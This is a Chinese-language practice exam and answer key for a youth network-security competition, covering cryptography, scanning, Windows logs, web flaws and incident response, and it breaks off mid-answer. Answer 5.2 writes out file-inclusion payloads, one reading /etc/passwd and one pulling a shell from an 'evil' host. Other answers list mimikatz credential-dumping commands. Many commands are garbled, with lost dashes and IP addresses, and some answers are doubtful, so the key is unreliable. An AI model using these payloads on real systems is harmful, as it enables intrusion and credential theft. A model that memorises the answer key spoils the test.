2025年青少年計(jì)算機(jī)競賽與考級《網(wǎng)絡(luò)安全》練習(xí)題及答案1.單項(xiàng)選擇題（每題1分，共20分。每題只有一個正確答案，請將正確選項(xiàng)字母填入括號內(nèi)）1.1在TLS1.3握手過程中，最先由客戶端發(fā)送的報文是（）A.ClientHello??B.ServerHello??C.ChangeCipherSpec??D.Finished答案：A1.2下列哪一項(xiàng)最能有效降低CSRF攻擊的成功率（）A.啟用HTTPS??B.使用SameSiteCookie屬性??C.部署WAF??D.增加密碼復(fù)雜度答案：B1.3關(guān)于SHA256與MD5的對比，下列說法正確的是（）A.兩者輸出長度相同??B.MD5抗碰撞性優(yōu)于SHA256??C.SHA256輸出256bit??D.兩者均屬于對稱加密算法答案：C1.4在Linux系統(tǒng)中，若文件權(quán)限為“rwxrsrx”，則該文件的SGID位表現(xiàn)為（）A.無SGID??B.SGID且作用于文件??C.SGID且作用于目錄??D.SUID答案：B1.5下列端口中，默認(rèn)用于LDAPS的是（）A.389??B.636??C.3268??D.3389答案：B1.6利用“arps”命令靜態(tài)綁定IPMAC對應(yīng)關(guān)系，主要防御的攻擊是（）A.IP欺騙??B.MACflooding??C.ARPspoofing??D.DHCPstarvation答案：C1.7在Windows日志中，事件ID4624表示（）A.賬戶登錄失敗??B.賬戶成功登錄??C.權(quán)限提升??D.對象訪問審計(jì)答案：B1.8下列關(guān)于零信任模型的描述，錯誤的是（）A.默認(rèn)不信任任何主體??B.先連接后認(rèn)證??C.動態(tài)策略決策??D.最小權(quán)限原則答案：B1.9使用nmap掃描時，參數(shù)“sS”的含義是（）A.TCPConnect掃描??B.SYN隱秘掃描??C.UDP掃描??D.版本探測答案：B1.10在公鑰基礎(chǔ)設(shè)施中，負(fù)責(zé)存儲已撤銷證書的是（）A.RA??B.CA??C.OCSP??D.CRL答案：D1.11下列哪條iptables規(guī)則可丟棄來自/24的ICMP報文（）A.iptablesAINPUTs/24picmpjDROPB.iptablesAOUTPUTd/24picmpjDROPC.iptablesAFORWARDs/24jREJECTD.iptablesAINPUTptcpdport22jACCEPT答案：A1.12關(guān)于內(nèi)存安全語言Rust的特性，下列說法正確的是（）A.使用自動垃圾回收機(jī)制??B.編譯期強(qiáng)制檢查所有權(quán)??C.允許空指針任意解引用??D.不提供類型系統(tǒng)答案：B1.13在Android應(yīng)用逆向中，smali代碼對應(yīng)的原始語言是（）A.C++??B.Java??C.Kotlin??D.Dart答案：B1.14下列哪項(xiàng)不是OWASPTop102021中的新條目（）A.不安全的設(shè)計(jì)??B.服務(wù)器端請求偽造??C.使用含有已知漏洞的組件??D.日志與監(jiān)控不足答案：C1.15若Web服務(wù)器返回“PublicKeyPins”響應(yīng)頭，其目的是（）A.強(qiáng)制瀏覽器校驗(yàn)證書公鑰??B.開啟HSTS??C.關(guān)閉緩存??D.允許跨域答案：A1.16在密碼學(xué)中，ECB模式的主要缺點(diǎn)是（）A.無法并行計(jì)算??B.相同明文塊產(chǎn)生相同密文塊??C.需要填充??D.需要IV答案：B1.17下列哪條命令可查看Windows本地安全策略（）A.lusrmgr.msc??B.secpol.msc??C.services.msc??D.devmgmt.msc答案：B1.18關(guān)于DNSSEC，下列說法正確的是（）A.使用DS記錄建立信任鏈??B.加密DNS查詢內(nèi)容??C.提供數(shù)據(jù)機(jī)密性??D.依賴第三方VPN答案：A1.19在Metasploit中，命令“showpayloads”的作用是（）A.列出可用漏洞模塊??B.列出兼容的攻擊載荷??C.列出提權(quán)腳本??D.列出監(jiān)聽端口答案：B1.20下列哪項(xiàng)最能描述“威脅狩獵”與“事件響應(yīng)”的區(qū)別（）A.前者主動后者被動??B.前者被動后者主動??C.兩者均依賴SIEM告警觸發(fā)??D.兩者均不需要威脅情報答案：A2.多項(xiàng)選擇題（每題2分，共20分。每題有兩個或兩個以上正確答案，多選、少選、錯選均不得分）2.1以下哪些屬于對稱加密算法（）A.AES??B.3DES??C.ECC??D.RC4答案：ABD2.2可導(dǎo)致DNS緩存投毒的成功條件包括（）A.事務(wù)ID可預(yù)測??B.端口隨機(jī)化未啟用??C.權(quán)威服務(wù)器啟用DNSSEC??D.遞歸服務(wù)器不檢查TTL答案：ABD2.3關(guān)于HTTP嚴(yán)格傳輸安全（HSTS），下列說法正確的是（）A.首次訪問仍需先通過HTTP??B.可包含在HTTPS響應(yīng)頭中??C.支持includeSubDomains指令??D.可設(shè)置preload列表答案：BCD2.4以下哪些技術(shù)可用于實(shí)現(xiàn)操作系統(tǒng)內(nèi)核完整性度量（）A.TPM??B.SGX??C.UEFISecureBoot??D.DRTM答案：ACD2.5以下哪些屬于常見的WebShell通信特征（）A.UserAgent固定為“Mozilla/5.0”??B.POST數(shù)據(jù)含base64編碼??C.返回200狀態(tài)碼但內(nèi)容長度異常??D.請求路徑包含隨機(jī)目錄答案：BCD2.6關(guān)于社會工程學(xué)攻擊，下列哪些屬于“預(yù)文本”階段的操作（）A.收集員工社交信息??B.偽造公司郵件域名??C.發(fā)送釣魚鏈接??D.建立虛假客服電話答案：ABD2.7以下哪些命令可用于獲取Windows系統(tǒng)本地哈希（）A.mimikatzlsadump::sam??B.hashdump??C.sekurlsa::logonpasswords??D.pwdump答案：ABCD2.8以下哪些端口與遠(yuǎn)程桌面協(xié)議直接相關(guān)（）A.3389??B.3390??C.2179??D.5357答案：ABC2.9以下哪些屬于云原生安全責(zé)任共擔(dān)模型中“租戶”層面的責(zé)任（）A.對象存儲桶訪問策略??B.物理機(jī)房安保??C.虛擬機(jī)GuestOS補(bǔ)丁??D.數(shù)據(jù)分類與加密答案：ACD2.10以下哪些方法可用于檢測SQL注入漏洞（）A.單引號報錯測試??B.時間盲注??C.聯(lián)合查詢??D.目錄遍歷答案：ABC3.填空題（每空1分，共20分）3.1在RSA算法中，若p=17，q=19，則歐拉函數(shù)φ(n)=________。答案：2883.2使用nmap進(jìn)行UDP端口掃描時，應(yīng)添加的參數(shù)為________。答案：sU3.3在Linux中，用于強(qiáng)制重置用戶密碼過期命令是________。答案：chaged0用戶名3.4在C語言中，可導(dǎo)致緩沖區(qū)溢出的危險函數(shù)包括gets與________。答案：strcpy3.5在PKCS5標(biāo)準(zhǔn)中，填充字節(jié)值為缺少的字節(jié)數(shù)，若缺3字節(jié)，則填充為________（十六進(jìn)制）。答案：0x030x030x033.6在Wireshark過濾器中，僅顯示源IP為且協(xié)議為TCP的表達(dá)式為________。答案：ip.src==&&tcp3.7在Windows中，用于查看當(dāng)前登錄用戶SID的命令是________。答案：whoami/user3.8在OWASPZAP中，用于自動爬取站點(diǎn)目錄的功能稱為________。答案：Spider3.9在AES128中，密鑰長度________bit，加密輪數(shù)________輪。答案：128；103.10在BGP安全擴(kuò)展BGPsec中，用于保護(hù)ASPath完整性的機(jī)制是________簽名。答案：路徑（或ASPath）3.11在Linux內(nèi)核中，用于限制進(jìn)程系統(tǒng)調(diào)用的安全機(jī)制縮寫為________。答案：seccomp3.12在AndroidManifest.xml中，聲明應(yīng)用不允許備份的屬性為________。答案：android:allowBackup="false"3.13在Metasploit中，設(shè)置反向監(jiān)聽IP的命令為set________。答案：LHOST3.14在密碼學(xué)中，DiffieHellman算法基于的數(shù)學(xué)難題是________。答案：離散對數(shù)3.15在HTTP響應(yīng)頭中，用于指示瀏覽器不要猜測MIME類型的頭字段是________。答案：XContentTypeOptions:nosniff3.16在Windows日志中，清除安全日志的事件ID為________。答案：11023.17在iptables中，保存當(dāng)前規(guī)則到文件的命令為________。答案：iptablessave>文件路徑3.18在CVE編號中，2024年分配的漏洞格式為CVE________________。答案：2024NNNNNN（答前兩位即可）3.19在云安全中，用于實(shí)例元數(shù)據(jù)服務(wù)未授權(quán)訪問的縮寫為________。答案：IMDS3.20在PHP中，關(guān)閉全局變量注冊的舊版配置項(xiàng)為________。答案：register_globals4.簡答題（每題6分，共30分）4.1簡述TLS1.3相比TLS1.2在握手階段的主要改進(jìn)，并說明其對性能與安全的影響。答案：TLS1.3將握手由兩次往返降為一次往返，并移除了RSA密鑰交換，僅支持(EC)DHE，從而具備前向保密；同時精簡了算法套件，移除弱加密算法如3DES、RC4、MD5等，減少攻擊面；握手消息加密開始于第三次消息，提高了隱私性；性能上減少往返時延，提升移動端體驗(yàn)。4.2說明Windows本地權(quán)限提升中“令牌竊取”的基本原理，并給出一種防御措施。答案：令牌竊取利用進(jìn)程打開令牌時未設(shè)置安全描述符，攻擊者通過OpenProcessToken、DuplicateTokenEx獲取高權(quán)限令牌，再調(diào)用CreateProcessWithTokenW啟動新進(jìn)程。防御措施包括：啟用UAC并設(shè)置為最高級別，限制管理員登錄，使用受保護(hù)的管理員（PAM）或CredentialGuard隔離令牌。4.3描述云存儲桶公開讀取數(shù)據(jù)泄露的場景，并給出AWSS3的修復(fù)命令。答案：場景：管理員誤將BucketACL或BucketPolicy設(shè)置為“Principal”:“”且“Action”:“s3:GetObject”，導(dǎo)致匿名用戶可下載對象。修復(fù)：awss3apiputbucketaclbucketmybucketaclprivate；再刪除或修改含“Allow”的Policy，僅保留最小權(quán)限。4.4解釋“代碼簽名證書”與“SSL證書”在驗(yàn)證目的、密鑰用法、有效期三方面的差異。答案：代碼簽名用于驗(yàn)證軟件發(fā)布者身份及完整性，密鑰用法為DigitalSignature，有效期通常1–3年；SSL證書用于加密傳輸及驗(yàn)證服務(wù)器身份，密鑰用法為KeyEncipherment/DigitalSignature，有效期現(xiàn)縮短至398天以內(nèi)。4.5說明Linux內(nèi)核模塊rootkit的檢測思路，并給出一條具體命令。答案：檢測思路：對比系統(tǒng)調(diào)用表、檢查模塊鏈表是否被劫持、驗(yàn)證內(nèi)核文本段哈希。命令：cat/proc/modules|sort>now.lst；重啟到可信LiveCD再生成基準(zhǔn)模塊列表base.lst；diffnow.lstbase.lst查找異常模塊。5.應(yīng)用與綜合題（共60分）5.1計(jì)算分析題（10分）已知某網(wǎng)站使用bcrypt(cost=12)存儲密碼哈希，服務(wù)器CPU為單核3GHz，實(shí)測每秒可計(jì)算4000次bcrypt。若攻擊者擁有含1000萬條哈希的泄露庫，采用暴力破解8位小寫字母+數(shù)字（36^8≈2.8×10^12）空間，請估算最壞情況下所需時間（年），并給出兩種緩解方案。答案：總次數(shù)=2.8×10^12；每秒4000次，需7×10^8秒≈22.2年。緩解：1.增加cost因子至14，計(jì)算量提升4倍；2.啟用多因素認(rèn)證，使離線哈希失去意義。5.2漏洞分析題（10分）給出以下PHP代碼片段：<?php$filename=$_GET['f'];include'/var/www/'.$filename.'.php';?>指出存在的漏洞類型，并給出兩種利用方式及對應(yīng)修復(fù)。答案：存在目錄穿越+文件包含（LFI/RFI）。利用1：?f=../../../etc/passwd%00截斷后包含系統(tǒng)文件；利用2：若allow_url_include=on，?f=http://evil/shell。修復(fù)：1.使用白名單數(shù)組in_array($filename,['home','about'])；2.關(guān)閉allow_url_include，并禁止空字節(jié)（PHP5.3.4已修復(fù)）。5.3網(wǎng)絡(luò)取證題（10分）捕獲文件show.pcapng中，發(fā)現(xiàn)一次HTTP上傳，Wireshark導(dǎo)出對象得到ZIP，解壓需密碼。提示：密碼為上傳POST請求中參數(shù)“pass”值。請寫出提取步驟與命令。答案：tsharkrshow.pcapngY'http.request.method==POST'Tfieldsetext|greppass→得到pass=H@ck2025；unzipPH@ck2025data.zip。5.4應(yīng)急響應(yīng)題（10分）生產(chǎn)服務(wù)器出現(xiàn)大量對外TCP445連接，/tmp/.xxx含未知二進(jìn)制，crontabl顯示每5分鐘下載/a.sh。請給出應(yīng)急處理流程（按時間順序）。答案：1.隔離網(wǎng)絡(luò)（關(guān)閉外網(wǎng)或改iptabl